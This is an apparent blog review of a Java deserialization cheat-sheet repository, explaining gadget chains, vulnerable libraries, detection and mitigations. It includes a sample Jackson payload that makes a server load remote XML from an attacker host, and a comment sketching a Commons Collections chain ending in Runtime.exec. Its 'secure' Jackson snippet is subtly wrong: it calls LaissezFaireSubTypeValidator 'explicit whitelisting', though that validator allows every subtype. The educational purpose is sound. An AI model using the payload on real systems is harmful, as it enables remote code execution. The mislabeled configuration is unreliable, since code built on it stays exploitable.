Inside Java Deserialization Attacks: A Security Cheat Sheet Worth 3,000+ Stars

Hook

In 2015, a single vulnerability class brought down major enterprise applications from WebLogic to Jenkins. Java deserialization attacks weren't just theoretical—they were weaponized at scale, and most developers had no idea their JSON parsers were remote code execution vectors waiting to happen.

Context

Java deserialization vulnerabilities represent one of the most devastating security issues in enterprise software history. When you deserialize untrusted data in Java, you're not just reconstructing an object—you're executing arbitrary code paths determined by an attacker. The issue emerged prominently in 2015 when researchers demonstrated that common Java libraries could be chained together to achieve remote code execution through carefully crafted serialized payloads.

The GrrrDog/Java-Deserialization-Cheat-Sheet repository exists because the attack surface is massive and fragmented. It's not just native Java serialization (ObjectInputStream) that's vulnerable—JSON libraries like Jackson and Fastjson, XML processors like XStream, YAML parsers, Hessian binary protocols, and even Adobe's AMF format all have similar issues. Each library has different gadget chains (sequences of method calls that lead to code execution), different exploit techniques, and different mitigations. Security researchers and penetration testers needed a centralized reference that catalogs this knowledge across the entire JVM ecosystem. This repository serves as that living document, aggregating research from top security experts, CVE details, conference presentations, and practical exploitation guidance.

Technical Insight

The core concept behind Java deserialization attacks is the "gadget chain"—a sequence of existing classes in your application's classpath that can be chained together during deserialization to achieve arbitrary code execution. The repository documents these chains across different libraries and provides the context needed to understand why they work.

Consider a classic native Java serialization attack using Apache Commons Collections. When Java deserializes an object, it automatically invokes certain methods like readObject(). If you can control the serialized data, you can construct an object graph that triggers dangerous method calls:

// Vulnerable deserialization code (DO NOT USE)
ObjectInputStream ois = new ObjectInputStream(untrustedInputStream);
Object obj = ois.readObject(); // RCE happens here

// What's actually happening behind the scenes with a malicious payload:
// 1. Deserializes a specially crafted InvokerTransformer object
// 2. Triggers ChainedTransformer during readObject()
// 3. Calls Runtime.getRuntime().exec("malicious command")

The cheat sheet catalogs specific gadget chains for libraries beyond native serialization. For JSON-based attacks, it documents how libraries like Jackson with default typing enabled can be exploited. Here's a conceptual example of what a malicious Jackson payload might look like:

{
  "@class": "org.springframework.context.support.ClassPathXmlApplicationContext",
  "configLocation": "http://attacker.com/malicious.xml"
}

This payload exploits Jackson's polymorphic deserialization feature to instantiate arbitrary classes. The repository documents which Jackson versions are vulnerable, which annotations (like @JsonTypeInfo) enable dangerous behavior, and critically—which gadget classes need to be present in the classpath for exploitation to succeed.

The cheat sheet's real value lies in its comprehensive coverage of detection and prevention techniques. It documents how to identify vulnerable deserialization endpoints through various methods: analyzing Java serialization magic bytes (0xAC ED 00 05), detecting base64-encoded serialized objects in HTTP parameters, and using tools like Java Deserialization Scanner for Burp Suite. For protection, it details specific configurations for each library:

// Secure Jackson configuration
ObjectMapper mapper = new ObjectMapper();
// Disable default typing - the primary vulnerability vector
mapper.disableDefaultTyping();

// If you absolutely need polymorphism, use explicit whitelisting
mapper.activateDefaultTyping(
    LaissezFaireSubTypeValidator.instance,
    ObjectMapper.DefaultTyping.NON_FINAL,
    JsonTypeInfo.As.PROPERTY
);

The repository also documents look-ahead deserialization filters introduced in Java 9+, which allow you to inspect and block dangerous classes before full deserialization occurs:

// Java 9+ deserialization filter
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "!org.apache.commons.collections.**;!org.springframework.**;java.base/*;!*"
);
ois.setObjectInputFilter(filter);

What makes this cheat sheet particularly valuable is its organization around real-world exploitation scenarios. It links to ysoserial, the de facto tool for generating deserialization payloads, and maps which ysoserial gadget chains work against which library versions. This practical connection between theory and tooling makes it immediately actionable for security assessments.

Gotcha

The primary limitation is that this is documentation, not tooling. You'll need to pair it with actual exploitation frameworks like ysoserial or marshalsec to perform security testing. The cheat sheet tells you what vulnerabilities exist and how they conceptually work, but you still need to understand the underlying Java security concepts to apply the knowledge effectively.

Maintenance and currency present another challenge. Deserialization vulnerabilities continue to emerge—Fastjson alone has had dozens of bypass techniques discovered after initial patches. While the repository has 3,000+ stars indicating community value, the update frequency for cutting-edge vulnerabilities (particularly in rapidly-evolving libraries like Fastjson and Jackson) may lag behind security mailing lists and CVE databases. For active penetration testing, you'll want to supplement this cheat sheet with recent security advisories and proof-of-concept repositories specific to your target library versions. The repository also lacks a structured, machine-readable format (like a JSON database of vulnerabilities with version mappings), which means you can't easily integrate it into automated vulnerability scanning pipelines—it's fundamentally a human-readable reference document.

Verdict

Use if: You're conducting security assessments or penetration testing on Java applications, you're a developer working with serialization libraries and need to understand the full threat landscape, or you're implementing security controls and need comprehensive guidance on protecting multiple serialization formats. This cheat sheet is essential for anyone who needs to explain why deserialization is dangerous or defend architecture decisions around data serialization choices. Skip if: You need actual exploitation tools (go directly to ysoserial instead), you're looking for automated vulnerability scanners rather than reference material, or you're working exclusively with non-JVM technologies. Also skip if you need real-time vulnerability intelligence—for production security monitoring, you'll want dedicated threat feeds and CVE tracking systems that update more frequently than community-maintained documentation.